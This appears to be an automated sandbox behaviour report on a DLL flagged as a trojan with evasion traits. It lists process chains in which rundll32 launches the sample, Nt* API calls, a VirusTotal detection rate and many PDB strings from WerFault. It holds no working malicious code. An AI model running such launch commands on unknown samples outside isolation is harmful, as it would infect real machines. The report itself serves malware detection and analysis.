Source: C:\Windows\System32\loaddll32.exe

Section loaded: lz32.dll

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA00730	1_2_6EA00730
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA09370	1_2_6EA09370
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E9F1494	1_2_6E9F1494
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E9FA4E8	1_2_6E9FA4E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA0143C	1_2_6EA0143C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E9F8428	1_2_6E9F8428

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA02234 NtDelayExecution,	1_2_6EA02234
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6EA02820 NtAllocateVirtualMemory,	1_2_6EA02820
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E9FBB44 NtClose,	1_2_6E9FBB44

Source: C:\Windows\System32\loaddll32.exe

Process Stats: CPU usage > 98%

Source: hMUh2Mkqyi.dll

Virustotal: Detection: 64%

Source: hMUh2Mkqyi.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 740
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 856
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6980
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6992

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1ED8.tmp

Jump to behavior

Source: classification engine

Classification label: mal80.troj.evad.winDLL@9/10@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: hMUh2Mkqyi.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: hMUh2Mkqyi.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wininet.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb4 source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb: source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000E.00000003.361363751.00000000053F4000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361895023.00000000036A4000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361413981.00000000036A4000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.368940345.0000000001132000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.367568231.000000000502C000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: ntdsapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb* source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: loaddll32.exe, 00000001.00000003.373455294.000000004B280000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.362573150.000000000369E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361405095.000000000369E000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.369578388.000000000112C000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb$ source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdbF source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376980156.00000000055E5000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: CoreMessaging.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb\| source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb< source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000E.00000002.378039548.0000000001032000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000002.384410910.0000000000AD2000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: WinTypes.pdbF source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdbh source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000E.00000003.361423675.00000000036AA000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361718983.00000000036AA000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.367632263.0000000001138000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb0 source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb" source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: WINMMBASE.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000E.00000003.362573150.000000000369E000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361405095.000000000369E000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376980156.00000000055E5000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbr source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb{3 source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.373455294.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: setupapi.pdb6 source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: winmm.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb4 source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: esent.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: TextInputFramework.pdb source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: pdh.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: ffty.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp, hMUh2Mkqyi.dll
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000E.00000003.361423675.00000000036AA000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361718983.00000000036AA000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.367632263.0000000001138000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376917644.00000000055E2000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000E.00000003.367515508.00000000059F0000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376967246.00000000055E0000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000E.00000003.361895023.00000000036A4000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000003.361413981.00000000036A4000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: lz32.pdb source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376995596.00000000055E8000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.376924560.00000000055E8000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000E.00000003.367500423.0000000005881000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.376845457.00000000054A1000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbf source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb` source: WerFault.exe, 0000000E.00000003.367524898.00000000059F6000.00000004.00000040.sdmp

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E9FF6A8 push esi; mov dword ptr [esp], 00000000h

1_2_6E9FF6A9

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
